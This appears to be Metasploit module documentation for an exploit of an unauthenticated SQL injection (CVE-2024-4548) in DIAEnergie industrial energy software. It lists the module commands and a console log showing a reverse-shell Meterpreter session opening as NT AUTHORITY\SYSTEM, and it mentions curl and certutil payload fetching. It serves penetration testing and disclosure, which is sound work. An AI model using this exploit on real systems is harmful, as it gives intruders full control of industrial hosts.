rapid7/metasploit-framework
# DIAEnergie SQL Injection (CVE-2024-4548)

This is a new module which exploits an unauthenticated SQL injection vulnerability in DIAEnergie <= v1.10 (CVE-2024-4548). 

Successful exploitation allows to gain code execution in the context of `NT AUTHORITY\SYSTEM`.

## Verification Steps

1. Install SQL Server. The Express version is sufficient (tested with 2019 and 2022).
2. Install the application from the [vendor](https://downloadcenter.deltaww.com/downloadCenterCounter.aspx?DID=39969&DocPath=1&hl=en-US).
3. Run Metasploit:
- [ ] `use exploit/windows/scada/diaenergie_sqli`
- [ ] `set RHOSTS <IP>` (e.g., `set RHOSTS 192.168.1.245`)

This should result in a meterpreter session:
```
msf6 exploit(windows/scada/diaenergie_sqli) > exploit 

[*] Started reverse TCP handler on 192.168.1.241:4444 
[*] 192.168.1.245:928 - Running automatic check ("set AutoCheck false" to disable)
[+] 192.168.1.245:928 - The target appears to be vulnerable.
[*] 192.168.1.245:928 - Sending SQL injection...
[*] 192.168.1.245:928 - Triggering script execution...
[*] 192.168.1.245:928 - Cleaning up database...
[+] 192.168.1.245:928 - Script successfully injected, check thy shell.
[*] Sending stage (201798 bytes) to 192.168.1.245
[*] Meterpreter session 1 opened (192.168.1.241:4444 -> 192.168.1.245:50605) at 2024-07-29 23:59:53 -0400

meterpreter > shell
Process 6392 created.
Channel 1 created.
Microsoft Windows [Version 10.0.19045.4529]
(c) Microsoft Corporation. All rights reserved.

C:\WINDOWS\system32>whoami
whoami
nt authority\system
```

**Successfully tested on**

Tested in the following deployments, with both the `curl` and `certutil` fetch commands.
- DIAEnergie v1.10 on Windows 10 22H2
- DIAEnergie v1.9 on Windows 10 22H2
